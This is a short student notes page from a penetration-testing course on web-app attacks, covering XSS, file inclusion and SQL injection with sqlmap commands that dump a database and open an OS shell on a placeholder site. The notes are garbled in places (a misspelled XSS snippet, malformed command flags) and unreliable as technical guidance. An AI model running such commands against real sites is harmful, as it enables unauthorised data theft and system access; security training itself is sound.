< All Advanced Penetration Testing Notes

functionsys | Advanced Penetration Testing | Module 11 - WebApps

By: functionsys | Related Course: Advanced Penetration Testing | Published: August 30, 2017 | Modified: September 4, 2017
Join Cybrary

Notepadcross site scripting

its about how to run 

script.alart(””);


Notepadfile inclusion

user burp spider , you can poll file from server to server …. using spider when you intercpet traffic 


NotepadSQL

SQLMAP -u ”https://websit.com/book.php?id=1” –dump

it will work for you and find vuln

 

SQLMAP -u ”https://websit.com/book.php?id=1” –os-shell 

it will run shell to get system 

then you will be in system 

os-shell> net users 

or type ipconfig , you will get ip address information 

 

 

 


Notepadwebapps part2

burpsuite 


< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 868 / December 14, 2019
How do I Get MTA Certified?
Views: 1423 / December 12, 2019
How much does your PAM software really cost?
Views: 1860 / December 10, 2019
How Do I Get into Android Development?
Views: 2249 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel